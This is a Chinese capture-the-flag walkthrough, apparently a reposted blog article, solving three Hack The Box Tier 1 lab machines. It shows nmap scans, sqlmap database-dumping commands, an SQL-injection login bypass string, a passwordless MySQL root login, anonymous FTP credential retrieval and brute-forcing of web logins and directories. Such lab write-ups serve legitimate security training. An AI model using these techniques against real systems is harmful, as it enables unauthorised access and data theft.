玩转HackTheBox靶场(二)

admin 2023年3月29日13:07:33评论87 views字数 1063阅读3分32秒阅读模式

本文我们接着前期文章来学习hackthebox相关的靶场关卡。

TIER0我们在直播过程中已经为大家进行了讲解,本文单独讲解 TIER1的关卡吧。

玩转HackTheBox靶场(二)

Appointment

这关考察的是sql注入相关方面的知识,我们首先对其进行端口扫描。

nmap -T4 -A 10.129.23.47 

玩转HackTheBox靶场(二)如上,我们可以到了只起开了80端口,毫无疑问应该是个web站长。访问IP如下。

玩转HackTheBox靶场(二)既然是存在sql注入,我们在burp中进行抓包,将数据放到sqlmap中进行扫描即可。

玩转HackTheBox靶场(二)将数据包保存为txt文件,然后执行下面命令。

sqlmap -r "22.txt" --dbs

如下,成功得到数据库信息。

玩转HackTheBox靶场(二)表信息

sqlmap -r "22.txt" -D appdb --tables

玩转HackTheBox靶场(二)表字段

sqlmap -r "22.txt" -D appdb -T users --columns
玩转HackTheBox靶场(二)

当然,除了sqlmap跑之外还有更简单的方法,我们利用万能账号直接登录就行了。如admin'#

玩转HackTheBox靶场(二)

Sequle

同样,我们还是选对设备进行端口扫描。

nmap -sC -sV 10.129.95.232

我们可以看到,目标开启了3306mysql端口。

玩转HackTheBox靶场(二)对于既然目标来气了mysql相关端口,我们可以尝试暴力破解或者匿名登录。执行下面命令

mysql -h 10.129.95.232 -u root -p

回车后,发现可以直接登录。

show databases; #显示数据库
use htb; #选择数据库
show tables; #显示表
select * from config; #查询表

如下,成功得到flag

玩转HackTheBox靶场(二)

Crocodile

同样,启动靶场后我们对目标进行端口扫描。

nmap -sC -sV 10.129.104.219

玩转HackTheBox靶场(二)如下,目标开启了21 80端口。并且21端口可以匿名登录。我们首先登录ftp来看看。

玩转HackTheBox靶场(二)下载文件

get allowed.userlist # 用户列表
get allowed.userlist.passwd # 密码列表

打开两个文件,疑似存放了账号和密码。我们访问80端口。

玩转HackTheBox靶场(二)利用后台扫描工具扫描站点后台地址

dirb http://10.129.104.219 -w  /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php

玩转HackTheBox靶场(二)用下载后的账号和密码进行登录,这里我用burp抓包后,进行枚举破解。

玩转HackTheBox靶场(二)成功得到flag

玩转HackTheBox靶场(二)

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):玩转HackTheBox靶场(二)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月29日13:07:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   玩转HackTheBox靶场(二)https://cn-sec.com/archives/1635968.html

发表评论

匿名网友 填写信息